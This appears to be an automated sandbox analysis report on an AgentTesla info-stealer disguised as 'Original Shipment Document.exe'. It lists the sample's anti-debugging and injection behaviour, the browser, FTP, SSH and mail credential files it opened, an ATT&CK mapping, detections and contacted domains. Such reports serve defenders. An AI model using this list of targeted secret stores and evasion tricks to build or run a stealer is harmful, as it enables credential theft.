Source: C:\Users\user\Desktop\Original Shipment Document.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process queried: DebugObjectHandle	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02342507 rdtsc		1_2_02342507
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02342507 rdtsc		1_2_02342507

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02341AEA LdrInitializeThunk,		1_2_02341AEA
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02341AEA LdrInitializeThunk,		1_2_02341AEA

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_0044D6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		12_2_0044D6F3
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_0044D6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		12_2_0044D6F3

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00443C20 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,		0_2_00443C20
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00443C20 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,		0_2_00443C20

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_0234222C mov eax, dword ptr fs:[00000030h]	1_2_0234222C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_0234275C mov eax, dword ptr fs:[00000030h]	1_2_0234275C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02341385 mov eax, dword ptr fs:[00000030h]	1_2_02341385
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02340BC1 mov eax, dword ptr fs:[00000030h]	1_2_02340BC1
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02342445 mov eax, dword ptr fs:[00000030h]	1_2_02342445
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02340CEF mov eax, dword ptr fs:[00000030h]	1_2_02340CEF
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_023408EF mov eax, dword ptr fs:[00000030h]	1_2_023408EF
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_0234222C mov eax, dword ptr fs:[00000030h]	1_2_0234222C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_0234275C mov eax, dword ptr fs:[00000030h]	1_2_0234275C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02341385 mov eax, dword ptr fs:[00000030h]	1_2_02341385
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02340BC1 mov eax, dword ptr fs:[00000030h]	1_2_02340BC1
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02342445 mov eax, dword ptr fs:[00000030h]	1_2_02342445
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02340CEF mov eax, dword ptr fs:[00000030h]	1_2_02340CEF
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_023408EF mov eax, dword ptr fs:[00000030h]	1_2_023408EF
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_0056275C mov eax, dword ptr fs:[00000030h]	4_2_0056275C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_00562445 mov eax, dword ptr fs:[00000030h]	4_2_00562445
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_0056222C mov eax, dword ptr fs:[00000030h]	4_2_0056222C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_00560BC1 mov eax, dword ptr fs:[00000030h]	4_2_00560BC1
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_005608EF mov eax, dword ptr fs:[00000030h]	4_2_005608EF
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_00561385 mov eax, dword ptr fs:[00000030h]	4_2_00561385
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_00451412 mov eax, dword ptr fs:[00000030h]	12_2_00451412
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_004514D0 mov eax, dword ptr fs:[00000030h]	12_2_004514D0

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_00560DCE LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,NtProtectVirtualMemory,	4_2_00560DCE
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_00560DCE LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,NtProtectVirtualMemory,	4_2_00560DCE
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_0044D6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_0044D6F3
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_0044C746 SetUnhandledExceptionFilter,	12_2_0044C746
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_0044FD7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0044FD7F
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_0044DBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_0044DBB5

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Memory protected: page read and write \| page guard			Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Memory protected: page read and write \| page guard			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Section loaded: unknown target: C:\Users\user\Desktop\Original Shipment Document.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Section loaded: unknown target: C:\Users\user\Desktop\Original Shipment Document.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Section loaded: unknown target: C:\Users\user\Desktop\Original Shipment Document.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Section loaded: unknown target: C:\Users\user\Desktop\Original Shipment Document.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Section loaded: unknown target: C:\Users\user\Desktop\Original Shipment Document.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Section loaded: unknown target: C:\Users\user\Desktop\Original Shipment Document.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'	Jump to behavior

Source: Original Shipment Document.exe, 0000000C.00000002.500534302.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Original Shipment Document.exe, 0000000C.00000002.500534302.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Original Shipment Document.exe, 0000000C.00000002.500534302.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: Original Shipment Document.exe, 0000000C.00000002.500534302.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: Original Shipment Document.exe, 0000000C.00000002.500534302.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: Original Shipment Document.exe, 0000000C.00000002.500534302.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Original Shipment Document.exe, 0000000C.00000002.500534302.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Original Shipment Document.exe, 0000000C.00000002.500534302.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: Original Shipment Document.exe, 0000000C.00000002.500534302.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: Original Shipment Document.exe, 0000000C.00000002.500534302.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	0_2_00405C78
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: GetLocaleInfoA,GetACP,	0_2_0040ACF0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: GetLocaleInfoA,	0_2_00409940
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: GetLocaleInfoA,	0_2_0040998C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	0_2_00405D84
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	0_2_00405C78
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: GetLocaleInfoA,GetACP,	0_2_0040ACF0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: GetLocaleInfoA,	0_2_00409940
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: GetLocaleInfoA,	0_2_0040998C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	0_2_00405D84
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: GetLocaleInfoA,	12_2_00450A4A

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004703B0 GetSystemTime,ExitProcess,6E1625A0,		0_2_004703B0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004703B0 GetSystemTime,ExitProcess,6E1625A0,		0_2_004703B0

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_023AA5A2 GetUserNameW,		12_2_023AA5A2
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_023AA5A2 GetUserNameW,		12_2_023AA5A2

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00444250 GetVersion,		0_2_00444250
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00444250 GetVersion,		0_2_00444250

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid			Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid			Jump to behavior

Source: Original Shipment Document.exe, 00000000.00000002.234035192.000000000019D000.00000004.00000010.sdmp	Binary or memory string: avp.exe
Source: Original Shipment Document.exe, 00000000.00000002.234035192.000000000019D000.00000004.00000010.sdmp	Binary or memory string: avp.exe

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000C.00000002.500431770.0000000000AE2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.499678365.0000000000459000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.499467401.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.332714204.000000001F732000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.500366577.0000000000A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.500615250.0000000002312000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.332753801.000000001F789000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Original Shipment Document.exe PID: 1848, type: MEMORY
Source: Yara match	File source: Process Memory Space: Original Shipment Document.exe PID: 5240, type: MEMORY
Source: Yara match	File source: 12.2.Original Shipment Document.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Original Shipment Document.exe.a90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Original Shipment Document.exe.2310000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Original Shipment Document.exe.a90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Original Shipment Document.exe.1f730000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Original Shipment Document.exe.ae0000.2.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\	Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Original Shipment Document.exe PID: 1848, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000C.00000002.500431770.0000000000AE2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.499678365.0000000000459000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.499467401.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.332714204.000000001F732000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.500366577.0000000000A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.500615250.0000000002312000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.332753801.000000001F789000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Original Shipment Document.exe PID: 1848, type: MEMORY
Source: Yara match	File source: Process Memory Space: Original Shipment Document.exe PID: 5240, type: MEMORY
Source: Yara match	File source: 12.2.Original Shipment Document.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Original Shipment Document.exe.a90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Original Shipment Document.exe.2310000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Original Shipment Document.exe.a90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Original Shipment Document.exe.1f730000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Original Shipment Document.exe.ae0000.2.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation111	Application Shimming1	Application Shimming1	Disable or Modify Tools1	OS Credential Dumping2	System Time Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	Input Capture11	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection112	Obfuscated Files or Information3	Credentials in Registry1	File and Directory Discovery1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing31	NTDS	System Information Discovery328	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion24	LSA Secrets	Query Registry1	SSH	Clipboard Data2	Data Transfer Size Limits	Application Layer Protocol12	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Security Software Discovery671	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Virtualization/Sandbox Evasion24	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Process Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Application Window Discovery11	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	Remote System Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	System Network Configuration Discovery1	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Original Shipment Document.exe	31%	Virustotal		Browse
Original Shipment Document.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.Original Shipment Document.exe.1f730000.4.unpack	100%	Avira	TR/Spy.Agent.lkofd	Download File
0.2.Original Shipment Document.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1131223	Download File
1.2.Original Shipment Document.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1135507	Download File
12.2.Original Shipment Document.exe.2310000.3.unpack	100%	Avira	TR/Spy.Agent.lkofd	Download File
1.1.Original Shipment Document.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1135507	Download File
12.2.Original Shipment Document.exe.ae0000.2.unpack	100%	Avira	TR/Spy.Agent.lkofd	Download File
12.2.Original Shipment Document.exe.400000.0.unpack	100%	Avira	TR/Spy.Agent.lkofd	Download File
12.1.Original Shipment Document.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
enmark.com.my	0%	Virustotal		Browse
mail.enmark.com.my	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://pC7mVPB6Y4Irl4x.org	0%	Avira URL Cloud	safe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt	0%	Avira URL Cloud	safe
http://checkip.amazonaws.comx&	0%	Avira URL Cloud	safe
http://pC7mVPB6Y4Irl4x.orgh_G	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
checkip.us-east-1.prod.check-ip.aws.a2z.com	52.206.184.85	true	false		high
googlehosted.l.googleusercontent.com	216.58.215.225	true	false		high
enmark.com.my	110.4.45.145	true	true	0%, Virustotal, Browse	unknown
mail.enmark.com.my	unknown	unknown	true	2%, Virustotal, Browse	unknown
checkip.amazonaws.com	unknown	unknown	false		high
doc-0c-3k-docs.googleusercontent.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://sectigo.com/CPS0	Original Shipment Document.exe, 0000000C.00000002.500024504.00000000005B3000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779	Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php	Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.phpH	Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	false		high
